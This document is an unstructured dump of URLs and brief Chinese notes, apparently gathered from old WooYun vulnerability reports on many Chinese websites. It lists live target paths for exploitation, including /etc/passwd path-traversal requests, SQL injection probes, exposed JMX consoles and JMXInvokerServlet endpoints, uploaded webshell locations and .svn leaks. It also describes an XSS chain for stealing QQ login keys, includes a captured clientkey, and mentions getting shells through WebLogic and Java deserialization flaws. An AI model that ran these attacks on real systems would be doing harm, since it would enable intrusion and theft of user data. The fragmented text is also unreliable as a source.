http://**.**.**.**/ejournals/journal/10.1055/s-00 http://**.**.**.**/activity/event_news_detail.php?event_id=13&topage=&qry_str= http://www.zhongxin200.cn/page.asp?id=104&typeid=26 http://www.zhongxin200.cn/showclass.asp?id=15 http://www.zhongxin200.cn/shownews.asp?newsid=5342&typeid=26 http://www.zhongxin200.cn/showqk.asp?id=13 http://www.zhongxin200.cn/showteam.asp?id=50&type=15&aid=62 http://**.**.**.**/esncku/zh/page.activity.action http://jyyy.jx.sgcc.com.cn http://cw.crcgas.com/ http://cw.crcgas.com/upload.asp http://new.conqueror.cn/now_download_products.php?id=279 http://**.**.**.**/activity_news_detail.php?id=48&topage= http://**.**.**.**/site_item_content_1.php?site_map_item_id=7 http://**.**.**.**/tcc/site_item_content_1.php?site_map_item_id=3 http://**.**.**.**/huide_hosp/big5/site_item_content_1.php?site_map_item_id=8 http://**.**.**.**/site_item_content_1.php?site_map_item_id=19 http://**.**.**.**/site_item_content_1.php?site_map_item_id=9 http://**.**.**.**/site_item_content_1.php?site_map_item_id=3 http://**.**.**.**/site_item_content_1.php?site_map_item_id=4 http://**.**.**.**/site_item_content_1.php?site_map_item_id=23 http://**.**.**.**/site_item_content_1.php?site_map_item_id=14 http://**.**.**.**/news/newslist.php?selectCat=3 http://**.**.**.**/news/newslist.php?selectCat=3 jk:12344312 http://www.jisupdftoword.com/user_validate?email=10000@jisupdfto.com&sign=MTAwMDBAamlzdXBkZnRvLmNvbQ== http://www.jisupdftoword.com/user_gotoresetpwd?email=10007@jisupdfto.com http://www.jisupdftoword.com/user_validate?email=10007@jisupdfto.com&sign=MTAwMDdAamlzdXBkZnRvLmNvbQ== http://**.**.**.**:8080/SSO/ResourceStation/pages/resourceUserResult.jsp?item=language&nLanguageId=4 http://**.**.**.**/SSO/ResourceStation/pages/resourceUserResult.jsp?item=language&nLanguageId=4 http://**.**.**.**/SSO/ResourceStation/pages/resourceUserResult.jsp?item=language&nLanguageId=4 http://**.**.**.**/3_1.php?news=501 http://**.**.**.**/_admin/login.php 
http://**.**.**.**/files/shell.php http://e.cheyipai.com/ http://f.cheyipai.com/Function/CarReport/ReportProBefUetcom.aspx?tradeCode=BJE151107551661&date=151107&tflag=1&shflag=0&csflag=0 http://media4.open.com.cn/L603/dongshi/xiaoxuesxxxxlx/manage/news_view.asp?newsid=246 http://**.**.**.**:9224//userCenter/checkVerifyCode.do?jsoncallback=jQuery17104104780244703179_1448281825349&phoneNumber=13333333333&type=findPass&verifyCode=1234&_=1448281880531 http://**.**.**.**/user/findPassword.do http://**.**.**.**/ http://my.3454.com/flash.php?ac=pk_iframe&do=next&fgid=1&wheeleid=1 http://140.206.49.178/messager/users.data http://**.**.**.**:8082/GenMedia/frmSearchResult.aspx?searchkey=e http://jmsc.tju.edu.cn http://www.wasu.com.cn/ http://www.wasu.com.cn/admin http://www.qoros.com/admincp/site/operator/search/list/search.php http://**.**.**.**/wcyc/news_detail.aspx?Activity_id=1 URL:http://**.**.**.**/wcyc/admin/Index.aspx http://**.**.**.**/wcyc/file/activity/957/54_aa.aspx http://**.**.**.**/aca2012/gra/unit_news.asp?id=3&ord=bdate%20desc,btime&desc=desc&kind2=dname|%E7%A0%94%E6%95%99%E7%B5%84 http://**.**.**.** http://**.**.**.**/download http://**.**.**.** http://auto.hualongxiang.com/list?b=48 http://itravel.huawei.com/ http://112.74.64.234:5555/index.action http://e.zznissan.com.cn/ajax_carprice.php?modelsId=254 http://e.zznissan.com.cn/ajax_car_price.php?seriesId=&cityId=830 http://e.zznissan.com.cn/ajax_jxs_list.php?jxs=&province=806&city=830&address= http://e.zznissan.com.cn/ajax_jxs_point.php?jxs=&province=806&city=830&address= http://e.zznissan.com.cn/ajax_jxs_view.php?jxs=&province=806&city=830&address= http://www.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.47074823500588536&pt_local_tk=12345678 http://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=11111111&callback=ptui_getst_CB&r=0.05807492393068969&pt_local_tk=12345678 
https://ssl.ptlogin2.qq.com/jump?clientuin=277634777&keyindex=9&pt_aid=522005705&daid=4&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=1232278179&pt_3rd_aid=0&ptopt=1&style=25 https://ssl.ptlogin2.qq.com/jump这个请求设置的cookie是httponly的,clientuin和clientkey在使用完后也删除了 http://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=11111111&callback=ptui_getst_CB&r=0.05807492393068969&pt_local_tk=12345678 http://ui.ptlogin2.qq.com/assistant/troubleshooter.html http://bbs.browser.qq.com/newthread?action=edit&fid=48&pid=242412&tid=93562&pos=9&special=0 http://ptlogin2.qq.com/jump?pt_clientver=5455&pt_src=1&keyindex=9&ptlang=2052&clientuin=3285197011&clientkey=00015653D111006897ED1217CB4F78787F701442DB6DC550D2A0A6B388E1D4528D3F41B14B359E345C244BBC75F24D6693707003C55A4BE0926A121E44B57AADEFCDE3DE182F2837B57578EC6F58E76D2D93E6EE435BDD6FB2C8AA7569AC13F71F2000FED048162503468772B1522983&u1=http%3A%2F%2Fbbs.browser.qq.com%2F http://ui.ptlogin2.qq.com/assistant/troubleshooter.html,执行我们的cookie存储xss,然后ptlogin的xss往cookie中写一个假的pt_local_token,然后伪造快速登陆的流程,此时,clientuin和clientkey已在cookie中种下,然后我们的xss再去偷即可 http://**.**.**.**/web/Help.aspx?code=Private http://war3.163.com:8443/login?from=%2F.利用java反序列化执行的漏洞获取一枚shell http://2.job1001.com http://**.**.**.**/admin/ http://xxx/admin_login.php登陆 http://xxx/admin/index.php即可进入后台 http://www.software.fudan.edu.cn/css/a/201511082001.html http://www.software.fudan.edu.cn/css/a/201511082002.html http://www.software.fudan.edu.cn/css/a/201511082817.html http://www.software.fudan.edu.cn/css/a/2015110818843.html http://www.software.fudan.edu.cn/help.jsp http://tdjxxy.tju.edu.cn http://flow.apps.huhoo.com/?huhoo_caseid=1 http://bjshzhy.opark.com/index.php/markets/index?huhoo_caseid=1&keyword=1 http://3chuang.nau.edu.cn/ http://eas.creditease.cn居然存在weblogic这个服务.然后利用反弹的脚本直接就得到了cmdshell http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=8 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=9 
http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=10 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=11 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=12 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=8000 https://github.com/hwf452/efb/blob/master/efb/resources/jdbc.properties jdbc:mysql://192.168.8.3:3306/EFB jdbc:mysql://121.40.183.68:3306/efb-1-3 jdbc:mysql://rdsr3u3ammzjyau.mysql.rds.aliyuncs.com/efb-1-3 jdbc:mysql://rdsy6vzb2y6vzb2.mysql.rds.aliyuncs.com/efb-1-1-4 http://www.jyb360.com/ http://web.jyb360.com/web/images/qrcode.png http://v.juhe.cn/sms/send http://210.21.212.7:8080/febop/requestApply.go https://trade.lionfund.com.cn/febop/requestApply.go http://oss.aliyuncs.com http://${bucketName}.oss-cn-hangzhou.aliyuncs.com http://sdk.open.api.igexin.com/apiex.htm http://www.qiangdaiwang.cn/robots.txt http://www.qiangdaiwang.cn/admin2015888/ Cookie:menuitems=1_1%2C2_1%2C3_1 https://github.com/huangjunkun/stat_vod_shell/blob/67b3431f0ca50b63b4856acf328de3c24beaba24/sendEmail.sh http://food.hualongxiang.com/home/shop/list?page=1&street=10 http://180.168.26.117:8080/ http://180.168.26.117:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://180.168.26.117:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/search/showdetail.aspx?rsid=37ebe474-acd4-4ff2-ba212b59eaf671a8&docid=9868&title=RFID%E5%B0%84%E9%A2%91%E8%AF%86%E5%88%AB%E6%8A%80%E6%9C%AF%E5%9C%A8%E6%99%BA%E8%83%BD%E4%BA%A4%E9%80%9A%E9%A2%86%E5%9F%9F%E7%9A%84%E5%BA%94%E7%94%A http://**.**.**.**/search/showdetail.aspx?rsid=37ebe474-acd4-4ff2-ba212b59eaf671a8&docid=9868&title=RFID%E5%B0%84%E9%A2%91%E8%AF%86%E5%88%AB%E6%8A%80%E6%9C%AF%E5%9C%A8%E6%99%BA%E8%83%BD%E4%BA%A4%E9%80%9A%E9%A2%86%E5%9F%9F%E7%9A%84%E5%BA%94%E7%94%A8 http://dms.essilorchina.com:7001/edmsii/ http://dms.essilorchina.com:7001/jmx-console http://dms.essilorchina.com:7001/wooyun/ixm.jsp http://dms.essilorchina.com:7001/invoker/JMXInvokerServlet 
http://dms.essilorchina.com:7001/is/index.jsp http://dms.essilorchina.com:7001/edmsii/purchase/elecdeliverycodemodify.do http://**.**.**.**/news_detail.php?cate=game&type=3&id=5694 http://**.**.**.**/news_detail.php?cate=game&type=3&id=5694 www.wanglibao.com https://183.239.152.54/por/login_psw.csp?sfrnd=2346912324982305&encrypt=0 http://eip.zznissan.com.cn:2051 http://u.muzhiwan.com/index.php?action=profile&opt=userHead http://**.**.**.**/ https://**.**.**.**/myadmin/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/sc8/logon/userlogon-interface.do集美大学网络教学平台 http://www.agehui.com/ xxoo.com//choose_seeds.php?city=0&district=0&land=1&pre_crop=0&province=0&season=2&soil=1 www.agehui.com URL:http://y.qq.com/m/client/msg/index.html?uid=1&cv=5050028&ct=11 http://**.**.**.**/view/home.action http://**.**.**.**/bugs/wooyun-2015-0144850 http://**.**.**.**/cn/products/access/dslam/201405/t20140515_423907.html http://**.**.**.**/job.php?id=1015 http://222.91.97.76/esoaisapp/login.jsp http://csic.wh.sdu.edu.cn http://csic.wh.sdu.edu.cn:80/ http://**.**.**.**/faq/?parent_id=1270 http://**.**.**.**/index.action http://**.**.**.**:9090/wcm/存在弱口令,且后台的用户名命名规范不够强,导致很容易猜测得到用户名,同时利用存在的弱口令漏洞,很轻易的就可以进入系统后台。 http://gaoshou.wanxue.cn/gaoshou/gsapp/gssend_message.do?phone=手机号&v=2 http://s.wanxue.cn/app/send_message.do?phone=手机号 http://gaoshou.wanxue.cn/gaoshou/gsappMine/gsUserDetails.do?v=1¤tUserId=1234&userId=待查ID http://gaoshou.wanxue.cn/gaoshou/gsappCoze/gsCounselorAndgroupsByOptions.do?sortField=USERNAME&sortType=ASC&pageNo=0&v=1&type=1&pageSize=2000 http://**.**.**.**/activity_news_detail.php?id=48&topage= http://**.**.**.**/site_item_content_1.php?site_map_item_id=7 http://**.**.**.**/tcc/site_item_content_1.php?site_map_item_id=3 http://**.**.**.**/huide_hosp/big5/site_item_content_1.php?site_map_item_id=8 http://**.**.**.**/site_item_content_1.php?site_map_item_id=19 http://**.**.**.**/site_item_content_1.php?site_map_item_id=9 
http://**.**.**.**/site_item_content_1.php?site_map_item_id=3 http://**.**.**.**/site_item_content_1.php?site_map_item_id=4 http://**.**.**.**/site_item_content_1.php?site_map_item_id=23 http://**.**.**.**/site_item_content_1.php?site_map_item_id=14 http://**.**.**.**/shop_qa_detail.php?id=33 http://**.**.**.**/prod_item_list.php?class_id=39 http://**.**.**.**/cn/prod_item_list.php?class_id=6 http://**.**.**.**/prod_item_list.php?class_id=1 http://**.**.**.**/big5/prod_item_list.php?class_id=4 http://**.**.**.**/prod_item_list.php?class_id=98 http://**.**.**.**/prod_item_list.php?class_id=5 http://**.**.**.**/china/prod_item_list.php?class_id=3 http://**.**.**.**/queryFile2.do?zihan=2 http://**.**.**.**/p_personservice.jspx?base=&resSys=%2Fr%2Fcms&res=r%2Fcms%2Fwww%2Fred&location=http%3A%2F%2F**.**.**.**%2Fperson%2Flogout.do&locale=zh_CN http://passport.m.111.com.cn/sso/login.action http://www.flyertrip.com/member/changepassword.php?p=xxxxx@qq.ccom http://**.**.**.**/news1.php?id=19 http://**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/sysconfig/network-scripts/ifcfg-eth1 FD:89:D0:85 http://**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://www.oppo.com/mx/components/com_activehelper_livehelp/server/frames.php?AGENTID=1&DOMAINID=1&LANGUAGE=sp&SERVER=&URL=http://www.oppo.com/mx/smartphone-r1l/ https://**.**.**.**/zongyl/WEB/blob/86d84f1ee4fdefa696cfa0b173456a96fe1c5f0c/src/main/java/com/yhjj/Test.java http://tee.sports.sohu.com./signin.php http://**.**.**.**/nbr.htm http://**.**.**.**/nbr.htm http://**.**.**.**/nbr.htm http://www.fesco.com.cn/vip/salon/baoming.asp http://**.**.**.**/index.php?c=Index&a=detail&catid=47&newid=249 http://**.**.**.**/Default.aspx http://eshop.yihao01.com/basedata/api/searchUnit?sign=4447C9E05AF05029A4B1C1DD87A40E85&cityCode=310100&v=2.4.0&ttid=1&keyword=江南 http://**.**.**.**/lib/class/index.php http://**.**.**.**/.svn/entries 
http://localhost:8088/sysinterface/codeEdit.jsp?filename=******5308.java&filetype=java http://hbjzmh.zznissan.com.cn/map.php?jxs=541 http://sqlmap.org http://www.k.cn/.svn/entries http://**.**.**.**/ http://**.**.**.**/dxjhProject/Download?strName=test.txt&strPath=../../../../../../../../../../etc/passwd&strType=affix https://**.**.**.** http://u1.guomob.com/ http://cn.gpspax.com https://github.com/licaihuan/obs/blob/a28dd5abf0c04c5b23e9382590b2b7b730f1b0b3/src/application/models/bizservice/utls_svc.php http://www.chinapnr.com http://www.chinapnr.com/questionnaire/questionnaire.php www.chinapnr.com http://www.chinapnr.com http://**.**.**.**:8080/SSO/ResourceStation/pages/resourceUserMore.jsp?nId=760 http://**.**.**.**/SSO/ResourceStation/pages/resourceUserMore.jsp?nId=760 http://sso/ResourceStation/pages/resourceUserMore.jsp?nId=760 http://**.**.**.**/assistant.php?cid=5&rl[]=90&ty=1 http://**.**.**.**/assistant.php?cid=5&rl[]=90&ty=1 http://demand.ad.xiaomi.com http://runreport.dnion.com/index.zul http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534 http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534 http://yun.zjer.cn/ http://**.**.**.**/oa/login.jsp http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.bntnews.cn/app/news.php?nid=31229 http://www.bntnews.cn/app/news.php?nid=31229 http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag http://**.**.**.**/news_list.php?ny=2015&nm=11 http://**.**.**.**/news_list.php?ny=2015&nm=11 http://**.**.**.**:8700/ http://**.**.**.**:8700/changePass http://**.**.**.**:8700/ChangePassword1.jsp http://subject.ourgame.com/,这个二级域名会跳转到主站! 
https://**.**.**.**/perbank5/pb3160_sendMobilDynPwd.do https://**.**.**.** https://**.**.**.** http://**.**.**.**/pos/ http://**.**.**.**:8088/ http://**.**.**.**:8088/ http://**.**.**.**:8888/ https://**.**.**.**/xiekc503/volunteer/blob/a20b8e92aa90a8d8dfaa9950c8be6d2235b92fb2/AutoSubmit/LoginDlg.cpp http://**.**.**.**/ http://**.**.**.**:8181/spam/system/index.action http://**.**.**.**/cn/download_more_714.html wsse:Username http://**.**.**.**/rx/login.aspx http://**.**.**.** http://**.**.**.**/index.php/Index/Ndetails/class/news/htmls/moving/id/1406.html http://**.**.**.**/program_page.php http://cmobile.colourlife.com/.svn/entries http://**.**.**.**:7001/Login.jsf http://**.**.**.**:7001/Login.jsf http://**.**.**.**:7001/Login.jsf http://bj.lianjia.com/cmsmanage/ http://topic.cnmo.com/topic_vote.php?voteid=56 http://qr.ciwong.com/qr/app/?a=fIbYVziYVN7v http://e.ciwong.com/admin/ http://www.gpspax.com http://**.**.**.**/ebooknw/printpage.asp?ArticleID=4107 http://www.vcash.cn http://www.vcash.cn/obiz/app/account/pwdfindreset www.vcash.cn http://cms.renrenche.com/src/#/articleList URL:http://kft.house.sina.com.cn/default/default/list?city=qd&housename=1&htype=1&loc=1&page=2&price=1 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**//site/review/review_user.asp?id=164459 http://**.**.**.**//site/review/review_user.asp?id=164459 http://**.**.**.**//site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**:3080/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://www.csstoday.so//site/review/review_user.asp?id=164459 http://**.**.**.**/ 
http://**.**.**.**/public/getclientset_evalstr.jsp http://**.**.**.** http://sus.museum.yiban.cn/webzine/webzine05.php http://sus.museum.yiban.cn/tess/upload/ http://welomo.com/index.php/Index/newscon?n_id=36 http://mba.tju.edu.cn/reg_servlet?action=portal.check_noapp&email=sample%2540email.tst&id=1 http://**.**.**.**//login.aspx http://**.**.**.**//login.aspx http://www.flyertrip.com/member/changepassword.php?p=xxxxxxx@xx.com https://**.**.**.**/MA/login/index.do http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 http://sqlmap.org https://github.com/yyhhk6/PingAnBankWeiXin https://github.com/yyhhk6/PingAnBankWeiXin/blob/9c2123df635c6c1388f0fa8ff88ccffe59e6c0e7/src/main/resources/properties/db.properties living.lib.tsinghua.edu.cn/index.php/Read/view/id/66.html living.lib.tsinghua.edu.cn/index.php/Read/view/id/66 living.lib.tsinghua.edu.cn/index.php/Read/view/id/66 http://www.zznissan.com.cn/dongfengfengdu/buy/Mp4Down.php?id=8 http://sqlmap.org http://**.**.**.** URL:http://zs.job168.com/train/searchresult.jsp data:im=70&keyword=42 http://**.**.**/login_czw.jsp_ http://baobao.baidu.com/papi/misuser/auditlist?type=4&auditSt=1&startTime=&endTime= http://baobao.baidu.com/papi/misuser/auditlist?type=0&auditSt=1 http://baobao.baidu.com/papi/misuser/groupmember?cid=300001&date=201511 http://baobao.baidu.com/papi/misuser/uniapplylist?status=2 https://**.**.**.**/award/ http://**.**.**.**/shipol/job.jsp http://**.**.**.**/shipol/document/20130307202946436323.jsp http://**.**.**.**/news_noTitle.php?id=162 http://tv.cntv.cn/live/cctv13 http://www.shuibeijie.com/front/index https://github.com/Vurteon/mks-server/blob/1c7134abbd5dc4409ad2262443f755ae987e33d3/web/WEB-INF/c3p0_con_pool.xml http://**.**.**/login_lg.jsp_ http://**.**.**.** http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../../ 
http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/C http://member.ehaier.com/login.html?returnUrl=http%3A%2F%2Fmember.ehaier.com%2Findex.html此处接口一开始无验证码,一定次数之后就出来了验证码 www.496691417@qq.com http://**.**.**.**/Backstage/Content/SpecialJob_SearchForSocietyResult.aspx?passportCardNo= http://oms.lncmcc.info:8087/lnmams/portal/login.action http://**.**.**.**/editor http://**.**.**.**/ntpuhistory/Alumni/ http://oi.tju.edu.cn/status?user=windyvov http://**.**.**.**/ http://**.**.**.**:8888/mingyu/sys/login.init.do http://www.kmimall.com/waps/shop_order?id=11275 http://www.flyertrip.com/hotels/personalCenter/editTravel.php?flag=update&id=237 http://games.mobileapi.hupu.com/3/7.0.4/chat/getChat?client=111&night=0&direc=next&gid=151050&type=nba&pid=29514&roomid=7 http://house.qingdaonews.com/news/pictjwap.asp?id=8106 http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key= http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key= site:admin.fenqi.im site:wxbd.fenqi.im http://**.**.**.**/page/article.php?id=135 http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 http://tutv.tju.edu.cn/Category?id=6&k=1 https://**.**.**.**/search?p=10&q=%**.**.**.**+username+password&ref=searchresults&type=Code&utf8=%E2%9C%93 http://**.**.**.**/bugs/wooyun-2015-0133219 http://**.**.**.**/ioop-bcs-web/main.do http://**.**.**.**/repair_log.asp?rid=A201503041555116491 http://**.**.**.**/wwwroot.rar android:targetSdkVersion="14 http://oldhr.jjshome.com/v/usercenter/register?type=1&id=1 http://14.17.123.10/ http://14.17.123.10/develop/ http://14.17.123.10/rockmongo/index.php?action=login.index&host=0 http://heilongjiang.zznissan.com.cn/showcartype_img.php?mid=5 www.chinalife.com.cn网站SOAP接口,无限刷注册用户信息,通过身份证号、邮箱等可以暴力查询注册用户信息,使用户信息泄漏。其用户信息涵盖了用户手机号、邮箱等等。 http://www.chinalife.com.cn/online/services/appRegisterQueryService?wsdl 
http://www.chinalife.com.cn/online/services/appRegisterUserService?wsdl http://touzhu.cn/ http://touzhu.cn http://fagui.eol.cn http://www.wasu.com.cn/news?newsid=32173 http://extplat.minanins.com:8011 http://extplat.minanins.com:8011/console/login/LoginForm.jsp http://extplat.minanins.com:8011/ca/ma3.jsp jdbc:oracle:thin:@172.40.1.20:1521/matedb http://**.**.**.** http://**.**.**.**/foods/index.php?cityid=5 http://**.**.**.**/foods/index.php?cityid=5 http://**.**.**.**/News/News_info.aspx?ID= http://**.**.**.**/InvestorRelations/ProtectDetail.aspx?ID= http://jituan.b2b.cn/category/Category/index?cid=312 http://**.**.**.**/teach_data/duty.php?id=2553 http://**.**.**.**/newsshow.asp?newsid=86 http://**.**.**.**/ggshow.asp?ggid=106 http://**.**.**.**/cqnjshow.asp?njid=17 http://**.**.**.**/jyxx_cqcrshow.asp?cqb_id=126 http://**.**.**.**/zcfgshow.asp?zcfgid=149 http://**.**.**.**/jyxx_swcrshow.asp?swb_id=118 http://**.**.**.**/zpxxshow.asp?zp_id=396 http://**.**.**.**/jgznshow.asp?id=13 http://www.qbm360.com/ http://xxx.kongzhong.com/index3.php http://xxx.kongzhong.com/server.php?action=full&Uid=605 http://sd.kongzhong.com//applicationlist.php?action=full&Uid=10 http://webzhj.kisdee.com/index.html http://cw.crcgas.com/index.asp http://cw.crcgas.com/cwdown.asp?id=59650 http://cw.crcgas.com/cwdown.asp?id=59651 http://cw.crcgas.com/cw1_del.asp?id=59651 http://cw.crcgas.com/cw1_del.asp?id=59650 http://**.**.**.**:8088 http://121.193.130.116/admin-console http://121.193.130.116/jmx-console/ http://cpcs.ule.cn/ulecase/toModifyUleCase.do?bugId=238621 http://vps.ule.com/vpsAdmin/admin/main.do android:targetSdkVersion="16 http://www.dogame.com.cn/space.php?user=xuechengjiaoyu http://**.**.**.**/ https://github.com/vinlinch/edwEtl/blob/d49ee7d44b0445f2a976102e79675b8aa5204e7a/src/DataWarehouse/DataWarehouse.SimulatingTool/App.config http://www.yunpian.com/api/user.html#a1 http://**.**.**.**/job/jobs_2_list1.php?id=-1 
http://tubic.tju.edu.cn/cgi-bin/blast/blast_genome.py?jobID=1111 http://u.itjuzi.com/tag?id=787&location=in http://cen-bds.dopool.com/?page_id=136 inurl:webapp/preview.jsp?ColumnID= http://**.**.**.**/iec/cas2_client_jsp/login.jsp?c=U03511,该地址为宝钢旗下的系统,其中C参数存在SQL注射漏洞 http://hr.allinpay.com:8082.利用java反序列化执行的漏洞获取一枚shell http://wx.allinpay.com/.意外的发现使用的是pigcms。拿出某过期的0day打了一发.直接就搞到了shell http://krt.huhoo.com http://os.wasu.cn/weixiu/login.php http://b.daojia.com.cn/service.php?action=2147483649&uid=1448444660855&user=e http://apitest.qufenqi.com/ http://zone.wooyun.org/content/1060 http://**.**.**.**/ http://www.yingshangkeji.com http://**.**.**.**/ http://login.beibei.com/member/find_passwd.html http://**.**.**.**/ http://**.**.**.**:80/ http://**.**.**.**/services/uddi/inquiryapi!IBM|http://**.**.**.**/services/uddi/v2beta/inquiryapi!IBM http://**.**.**.**/inquire!Microsoft|http://**.**.**.**/glue/inquire/uddi!XMethods| https://**.**.**.**/check_verify.php?uid=5654fc11a42df http://upesn.com http://**.**.**.**/news/list?title=a&type_id=1 http://epp.dell-brand.com//user.php?act=signin http://**.**.**.** F9342B61ADBA3CBA1CD931E36589D702:FG=1 http://**.**.**.** http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/bugs/wooyun-2015-0105038 http://bj.luckyair.net/8l/flight/multiway.action http://bj.luckyair.net/8l/flight/multiway.action http://bm.huatu.com/plus/sd_sk.php?fx=%B3%A4%B4%BA%B7%D6%D0%A3&kslx=%CA%A1%BF%BC&province=-1&sfzs=&typeid=852 http://pyh.luckyair.net:80/ http://**.**.**.**/index.php/Home/Help/show?id=134 http://**.**.**.**/index.php/Admin/Login/index.html 
http://jxjy.shsmu.edu.cn/ShowBroad.aspx?Broad=201511241056 http://jxjy.shsmu.edu.cn/ http://jxjy.shsmu.edu.cn/photo/13/ http://**.**.**.**/06/health_area_detail.php?id=15 http://**.**.**.**/health_area_detail.php?id=6 http://**.**.**.**/health_area_detail.php?id=45 http://**.**.**.**/jiannren/health_area_detail.php?id=135 http://**.**.**.**/health_area_detail.php?id=9 http://**.**.**.**/cn/health_area_detail.php?id=5 http://**.**.**.**/old/health_area_detail.php?id=33 http://**.**.**.**/health_area_detail.php?id=131 http://**.**.**.**/health_area_detail.php?id=132 http://**.**.**.**/health_area_detail.php?id=3 http://**.**.**.**/health_area_detail.php?id=1 http://**.**.**.**/activity_news_list.php?class_id=1 http://**.**.**.**/activity_news_list.php?class_id=1 http://**.**.**.**/activity_news_list.php?class_id=1 http://**.**.**.**/fgs_arts/tw/activity_news_list.php?class_id=1 http://**.**.**.**/activity_news_list.php?class_id=1 http://**.**.**.**/activity_news_list.php?class_id=1 http://**.**.**.**/active_detail.php?id=145 http://**.**.**.**/active_detail.php?id=62 http://**.**.**.**/active_detail.php?id=124 http://rb.tcl.com/ http://rb.tcl.com/shell.jspx http://m.v.huatu.com/netclass/freeVideo.php?action=getMore&condition=&page=1&sqlClause=-1&type1=b.id http://www.zdonline.com/test/pie.php?p=2012 http://ec.eqixin.com/?sn=QX2209151383001441873713 URL:http://**.**.**.**/Card.aspx?CardNumder= id:98225、id:154565 http://**.**.**.**:8086/holidays/hotel_detail.asp?route=mfm&seq=10 http://**.**.**.**:8086/about/news_articles.asp?id=54 http://**.**.**.**:8086/tips/tips_intro.asp?unqid=12 http://daojia.com.cn/voucher_code.php?AC_area=1&name=%e8%af%b7%e8%be%93%e5%85%a5%e9%a4%90%e5%8e%85%e5%90%8d%e7%a7%b0 http://front.emba.huhoo.com/index.php/courses?huhoo_caseid=24 http://**.**.**.**/ https://**.**.**.**/rui/xmailer/blob/8dbb408b094e6676501929e87d8160e13385a20b/test/sertest.py http://meitu.fengniao.com/.svn/entries http://meitu.fengniao.com/css/.svn/entries 
http://counter.fengniao.com/log/all.log http://180.149.144.210/tool/demo.php?action=list&path=/home/bae/wwwdata/webroot/&t=1444798305167 http://blog.9666.cn/website/myWebsite.action?BlogType=3 http://wooyun.org/bugs/wooyun-2015-0156000 http://mail.zto.cn/index.php http://**.**.**.**/ http://**.**.**.**/ http://edu.baidu.com// http://edu.baidu.com/taoli/resource/personInfoG.jsp http://jzcc.zznissan.com.cn/ http://jzcc.zznissan.com.cn/map.php?jxs=223 http://jxpt.cuc.edu.cn/ http://jxpt.cuc.edu.cn http://123.103.9.38:8080/secure/Dashboard.jspa http://123.103.9.38:8080/secure/Signup!default.jspa http://**.**.**.**:8001 http://60.255.41.34/ http://**.**.**.**/ywsp/lcpz/fjgl_downLoad.jsp?wid=1 https://vpn.wanda.cn http://shop.9you.com/yzbp/like http://admin.open.yy.com/ http://admin.open.yy.com/stat/index.php.bak http://**.**.**.**:8083/holidays/hotel_detail.asp?route=mfm&seq=30 http://**.**.**.**:8083/about/news_articles.asp?id=21 http://**.**.**.**:8083/tips/tips_intro.asp?unqid=1 http://**.**.**.**:8083/airshopping/eshopping_intro.asp?item=51002922 retrieved:guestuser http://163.177.25.60/ http://www.qh.sgcc.com.cn:7001是weblogic。测试一下居然成功执行了 http://lib.cqvip.com http://x.luckyair.net:88/cms/jeeadmin/jeecms/index.do http://**.**.**.**/xwzx/xx.jsp?newsId=1321 XSS:http://**.**.**.**/ http://**.**.**.**/quality/index!login.action http://**.**.**.**/zxgg/index.php?p=4&kind_id=1 http://sh.itjuzi.com/everjob?id=1&type=invsp 